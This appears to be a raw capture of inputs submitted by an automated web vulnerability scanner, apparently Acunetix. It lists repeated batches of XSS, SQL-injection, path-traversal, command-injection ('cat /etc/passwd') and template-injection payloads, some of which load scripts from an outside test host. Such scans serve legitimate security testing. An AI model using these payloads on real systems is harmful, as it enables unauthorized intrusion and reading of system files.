1<div style=width:expression(prompt(928937))>

1

WEB-INF\web.xml

'&cat /etc/passwd&'

1

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

../../../../../../../../../../etc/passwd

1<iframe src='data:text/html

SomeCustomInjectedHeader:injected_by_wvs

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

"&cat /etc/passwd&"

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(931721)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

cat /etc/passwd

-1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(942732)>

../../../../../../../../../../etc/passwd.jpg

1

1

1

-1)

`cat /etc/passwd`

1

${100056+99888}

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<img src=xyz OnErRor=prompt(979545)>

1

1

1

|cat /etc/passwd#

1

-1))

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n932208=v940833

1

1<img/src=">" onerror=alert(914578)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

)

'|'ld

1some_inexistent_file_with_long_name%00.jpg

1

iWnucqSA'

1

1<ScRiPt%20>prompt(939454)</sCripT>

"|"ld

!(()&&!|*|*|

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1&lt

'"()

yhHEk3KJ')

^(#$!@#$)(()))******

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

testasp.vulnweb.com

1

\xf6<img acu onmouseover=prompt(936986) //\xf6>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

'

LjnNWdYO'))

1

1

1

1<input autofocus onfocus=prompt(926433)>

1

/etc/passwd

1

-1

1

1

"

"

1

<a href='http://www.acunetix.com'>website security</a>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

http://hit3aP3uTA9aR.bxss.me/

1

-1)

acunetix_wvs_invalid_filename

[url=http://www.acunetix.com]website security[/url]

${@print(md5(acunetix_wvs_security_test))}

1

||cat /etc/passwd

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1_ERZ59 <ScRiPt >prompt(995747)</ScRiPt>

comments

-1))

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

&dir

1

1

1

RHXKhIrh'

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

'&dir&'

1

1

http://www.acunetix.tst

1

1

comments/.

fMWvDS6E')

1'"()&%<ScRiPt >prompt(990185)</ScRiPt>

"&dir&"

'"

1

1

1

file:///etc/passwd

1

|dir

<!--

'"()&%<ScRiPt >prompt(933444)</ScRiPt>

Af19FuIL'))

1

'|dir

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1_919642

1

1

1

1

WEB-INF/web.xml

"|dir

1

1

1

WEB-INF\web.xml

1

acu2469\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2469

1

1

1

1

acux9808\xc0\xbez1\xc0\xbcz2a\x90bcxuca9808

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1<ScRiPt >prompt(919670)</ScRiPt>

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1<script>prompt(972321)</script>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(960792)</ScRiPt>

1

1

1

................windowswin.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?928730></ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt >prompt(975340)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<video><source onerror="javascript:prompt(901949)">

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(929790)"></g></svg>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

response.write(9742635*9781062)

1

1<div style=width:expression(prompt(995375))>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

&cat /etc/passwd&

'+response.write(9742635*9781062)+'

1

1

1<iframe src='data:text/html

1

'&cat /etc/passwd&'

"+response.write(9742635*9781062)+"

1

1

1

1<body onload=prompt(950568)>

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

WEB-INF/web.xml

1

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(996996)>

1

cat /etc/passwd

1

1

WEB-INF\web.xml

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

`cat /etc/passwd`

1<img src=xyz OnErRor=prompt(993416)>

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

${99434+99237}

1

../../../../../../../../../../etc/passwd.jpg

1

1

1

-1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<img/src=">" onerror=alert(945255)>

|cat /etc/passwd#

1

1&n947198=v919863

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

1<ScRiPt%20>prompt(958461)</sCripT>

'|'ld

)

1some_inexistent_file_with_long_name%00.jpg

-1)

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&lt

"|"ld

!(()&&!|*|*|

-1))

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

'"()

^(#$!@#$)(()))******

/../..//../..//../..//../..//../..//etc/passwd.jpg

\xf6<img acu onmouseover=prompt(999073) //\xf6>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

1

testasp.vulnweb.com

1

s85Dq5dW'

'

1

1

"

1<input autofocus onfocus=prompt(942479)>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1

"

1

T5bUxCv2')

1

http://hitKq8Brd6IUo.bxss.me/

/etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

<a href='http://www.acunetix.com'>website security</a>

1

dOXciRe1'))

1

acunetix_wvs_invalid_filename

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

[url=http://www.acunetix.com]website security[/url]

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

-1

&dir

comments

1

1

1_EfcSo <ScRiPt >prompt(984987)</ScRiPt>

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

-1)

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

'&dir&'

1

1

1

comments

http://www.acunetix.tst

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

'"

"&dir&"

-1))

1'"()&%<ScRiPt >prompt(910359)</ScRiPt>

1

1

comments/.

1

1

'"()&%<ScRiPt >prompt(941202)</ScRiPt>

115bnGCs'

|dir

<!--

1

file:///etc/passwd

1

1

1

1_962459

1

'|dir

uF8nkh9O')

1

/\../\../\../\../\../\../\../etc/passwd

1

1

"|dir

WEB-INF/web.xml

acu3775\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3775

1

Bp1b9En0'))

1

1

1

WEB-INF\web.xml

1

acux7606\xc0\xbez1\xc0\xbcz2a\x90bcxuca7606

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

1<ScRiPt >prompt(946236)</ScRiPt>

../../../../../../../../../../boot.ini

1

1

1<script>prompt(911710)</script>

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(903224)</ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?907704></ScRiPt>

................windowswin.ini

1

1

1

1<ScRiPt >prompt(985513)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<video><source onerror="javascript:prompt(974940)">

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(987423)"></g></svg>

response.write(9679969*9894730)

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

'+response.write(9679969*9894730)+'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<div style=width:expression(prompt(951104))>

1

1

1

"+response.write(9679969*9894730)+"

1

1

1<iframe src='data:text/html

&cat /etc/passwd&

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

../../../../../../../../../../etc/passwd

WEB-INF/web.xml

1

1<body onload=prompt(902839)>

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(916510)>

1

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd.jpg

cat /etc/passwd

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1<img src=xyz OnErRor=prompt(978596)>

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

`cat /etc/passwd`

1<img/src=">" onerror=alert(918410)>

1

-1

${100280+100105}

1

1

|cat /etc/passwd#

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<ScRiPt%20>prompt(936634)</sCripT>

1

1

1

-1)

1

'|'ld

1

1&lt

/../..//../..//../..//../..//../..//etc/passwd.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

"|"ld

-1))

1&n918885=v916741

)

\xf6<img acu onmouseover=prompt(940789) //\xf6>

1

1some_inexistent_file_with_long_name%00.jpg

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'"()

coZ5YCun'

1

!(()&&!|*|*|

1<input autofocus onfocus=prompt(957760)>

1

TIuZne51')

1

/etc/passwd

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

<a href='http://www.acunetix.com'>website security</a>

^(#$!@#$)(()))******

'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

60JBSOYh'))

1

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

testasp.vulnweb.com

[url=http://www.acunetix.com]website security[/url]

-1

"

1

1

1

"

1_8Qotg <ScRiPt >prompt(984435)</ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

||cat /etc/passwd

-1)

${@print(md5(acunetix_wvs_security_test))}

1

http://hitUkwK4zQQTY.bxss.me/

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

-1))

&dir

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}\

1

1

1

1

1

wAJQ70GT'

1

comments

1

1

'&dir&'

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

aYS0qV47')

file:///etc/passwd

1

1

'"

1

http://www.acunetix.tst

comments

1

"&dir&"

1'"()&%<ScRiPt >prompt(953386)</ScRiPt>

1

/\../\../\../\../\../\../\../etc/passwd

sl2qrIDY'))

<!--

|dir

comments/.

1

1

'"()&%<ScRiPt >prompt(987226)</ScRiPt>

1

1

WEB-INF/web.xml

1

1

1_999775

1

'|dir

1

1

WEB-INF\web.xml

1

1

"|dir

acu2645\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2645

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

acux2147\xc0\xbez1\xc0\xbcz2a\x90bcxuca2147

../../../../../../../../../../boot.ini

1

1

1<ScRiPt >prompt(971183)</ScRiPt>

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1<script>prompt(997057)</script>

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(982179)</ScRiPt>

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?998503></ScRiPt>

1

1

................windowswin.ini

1

1<ScRiPt >prompt(922996)</ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<video><source onerror="javascript:prompt(983615)">

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(929409)"></g></svg>

1

1

response.write(9570644*9588279)

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<div style=width:expression(prompt(925534))>

1

1

'+response.write(9570644*9588279)+'

&cat /etc/passwd&

1

1

1<iframe src='data:text/html

WEB-INF/web.xml

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

"+response.write(9570644*9588279)+"

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1<body onload=prompt(906090)>

SomeCustomInjectedHeader:injected_by_wvs

1

WEB-INF\web.xml

../../../../../../../../../../etc/passwd

1

1

"&cat /etc/passwd&"

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(981695)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<img src=xyz OnErRor=prompt(999158)>

cat /etc/passwd

-1

../../../../../../../../../../etc/passwd.jpg

1

1

1

1

1

1<img/src=">" onerror=alert(975879)>

`cat /etc/passwd`

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1)

1

|cat /etc/passwd#

1<ScRiPt%20>prompt(953660)</sCripT>

1

${100207+100457}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n918149=v935212

1

-1))

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1&lt

'|'ld

1

1some_inexistent_file_with_long_name%00.jpg

1

1

)

"|"ld

\xf6<img acu onmouseover=prompt(913603) //\xf6>

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

QRhIzF6p'

!(()&&!|*|*|

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<input autofocus onfocus=prompt(923043)>

ef2BIibD')

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'

1

'"()

<a href='http://www.acunetix.com'>website security</a>

'

testasp.vulnweb.com

^(#$!@#$)(()))******

1

/etc/passwd

"

1

obxCybDI'))

1

1

"

[url=http://www.acunetix.com]website security[/url]

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1

1

1

${@print(md5(acunetix_wvs_security_test))}

||cat /etc/passwd

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1_GVcQ5 <ScRiPt >prompt(964217)</ScRiPt>

-1)

1

${@print(md5(acunetix_wvs_security_test))}\

1

&dir

1

http://hitDP15nIlyHy.bxss.me/

1

-1))

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

1

'&dir&'

acunetix_wvs_invalid_filename

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

NImbORta'

comments

1

"&dir&"

1

http://www.acunetix.tst

1

1

file:///etc/passwd

1

comments

4gIGmsMH')

1

|dir

'"

1

1'"()&%<ScRiPt >prompt(937636)</ScRiPt>

0RluEo4E'))

comments/.

/\../\../\../\../\../\../\../etc/passwd

1

1

'"()&%<ScRiPt >prompt(927821)</ScRiPt>

'|dir

<!--

1

1

1

WEB-INF/web.xml

1

"|dir

1

1_983103

1

1

1

1

WEB-INF\web.xml

1

1

../../../../../../../../../../windows/win.ini

acu5033\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5033

1

1

1

1

../../../../../../../../../../boot.ini

1

acux10340\xc0\xbez1\xc0\xbcz2a\x90bcxuca10340

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<ScRiPt >prompt(906436)</ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1<script>prompt(968202)</script>

................windowswin.ini

1

1

1

1<ScRiPt >prompt(947397)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?915729></ScRiPt>

1

1

1

1

1<ScRiPt >prompt(940656)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<video><source onerror="javascript:prompt(988106)">

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

response.write(9605432*9158452)

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(998272)"></g></svg>

1

1

1

WEB-INF/web.xml

&cat /etc/passwd&

'+response.write(9605432*9158452)+'

1<div style=width:expression(prompt(944679))>

WEB-INF\web.xml

1

1

1

1<iframe src='data:text/html

"+response.write(9605432*9158452)+"

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

1

../../../../../../../../../../etc/passwd

1<body onload=prompt(984739)>

cat /etc/passwd

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

SomeCustomInjectedHeader:injected_by_wvs

1

`cat /etc/passwd`

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(977853)>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1

-1

|cat /etc/passwd#

${99319+99826}

1

1

../../../../../../../../../../etc/passwd.jpg

1<img src=xyz OnErRor=prompt(911959)>

'|'ld

-1)

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1<img/src=">" onerror=alert(922154)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

"|"ld

-1))

1<ScRiPt%20>prompt(958058)</sCripT>

1&n955117=v949340

1some_inexistent_file_with_long_name%00.jpg

1

)

1

0s1aDxzD'

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&lt

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

1

1

DSmqai0l')

/../..//../..//../..//../..//../..//etc/passwd.jpg

\xf6<img acu onmouseover=prompt(905831) //\xf6>

'

1

'"()

testasp.vulnweb.com

http://testasp.vulnweb.com/t/xss.html?%00.jpg

qwpIXOli'))

^(#$!@#$)(()))******

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1

"

1<input autofocus onfocus=prompt(942644)>

1

/etc/passwd

1

-1

'

1

1

<a href='http://www.acunetix.com'>website security</a>

||cat /etc/passwd

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

http://hit6qbCvHd3UG.bxss.me/

-1)

1

1

[url=http://www.acunetix.com]website security[/url]

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

acunetix_wvs_invalid_filename

&dir

${@print(md5(acunetix_wvs_security_test))}

1

1_lbgz3 <ScRiPt >prompt(958820)</ScRiPt>

1

1

-1))

1

${@print(md5(acunetix_wvs_security_test))}\

'&dir&'

comments

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

http://www.acunetix.tst

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

QgMDffnk'

comments

"&dir&"

1

1

1

1

comments/.

k9POv217')

1

1

1

1

1

|dir

file:///etc/passwd

1

'"

1'"()&%<ScRiPt >prompt(974906)</ScRiPt>

1

Qb9B0XRc'))

1

'|dir

1

/\../\../\../\../\../\../\../etc/passwd

<!--

1

1

1

'"()&%<ScRiPt >prompt(912607)</ScRiPt>

1

WEB-INF/web.xml

1

"|dir

1

1

1

1_917099

1

WEB-INF\web.xml

1

1

1

../../../../../../../../../../windows/win.ini

1

acu2182\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2182

1

1

1

../../../../../../../../../../boot.ini

1

1

acux7465\xc0\xbez1\xc0\xbcz2a\x90bcxuca7465

1

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt >prompt(931846)</ScRiPt>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<script>prompt(947888)</script>

................windowswin.ini

1

1

1<ScRiPt >prompt(971217)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?964993></ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(901682)</ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<video><source onerror="javascript:prompt(980686)">

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

response.write(9767443*9300345)

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(956988)"></g></svg>

1

'+response.write(9767443*9300345)+'

&cat /etc/passwd&

1<div style=width:expression(prompt(976690))>

1

1

1

"+response.write(9767443*9300345)+"

WEB-INF/web.xml

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

1<iframe src='data:text/html

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd

WEB-INF\web.xml

1

SomeCustomInjectedHeader:injected_by_wvs

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

1<body onload=prompt(989646)>

cat /etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1

`cat /etc/passwd`

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(956911)>

1

1

1

../../../../../../../../../../etc/passwd.jpg

-1)

1

1

|cat /etc/passwd#

1<img src=xyz OnErRor=prompt(950233)>

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

${99007+100455}

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

'|'ld

1<img/src=">" onerror=alert(966075)>

1

1&n980948=v903762

-1))

1

1<ScRiPt%20>prompt(998160)</sCripT>

1

1

1some_inexistent_file_with_long_name%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"|"ld

1nrlXbdF'

1

1

1

)

1&lt

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

sDP2yqg3')

1

\xf6<img acu onmouseover=prompt(965083) //\xf6>

!(()&&!|*|*|

testasp.vulnweb.com

'

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

6o2EnzDD'))

1

1<input autofocus onfocus=prompt(968098)>

'

"

1

^(#$!@#$)(()))******

'"()

/etc/passwd

1

1

"

-1

<a href='http://www.acunetix.com'>website security</a>

||cat /etc/passwd

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

&dir

[url=http://www.acunetix.com]website security[/url]

-1)

${@print(md5(acunetix_wvs_security_test))}

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

${@print(md5(acunetix_wvs_security_test))}\

-1))

1_sCT3O <ScRiPt >prompt(941510)</ScRiPt>

'&dir&'

http://hits55u6DgULI.bxss.me/

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

acunetix_wvs_invalid_filename

"&dir&"

1

3SK3YcQa'

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

http://www.acunetix.tst

|dir

'"

1

1

1

U8bpVCcf')

'|dir

1

file:///etc/passwd

1

comments

<!--

VFB0WPGR'))

1

1

1

"|dir

1

comments/.

1'"()&%<ScRiPt >prompt(956077)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

1

WEB-INF/web.xml

'"()&%<ScRiPt >prompt(946895)</ScRiPt>

1

1

1

1

1

1_984580

WEB-INF\web.xml

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1

1

acu5773\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5773

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

acux4650\xc0\xbez1\xc0\xbcz2a\x90bcxuca4650

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1

................windowswin.ini

1<ScRiPt >prompt(949909)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<script>prompt(902134)</script>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt >prompt(936311)</ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?930384></ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

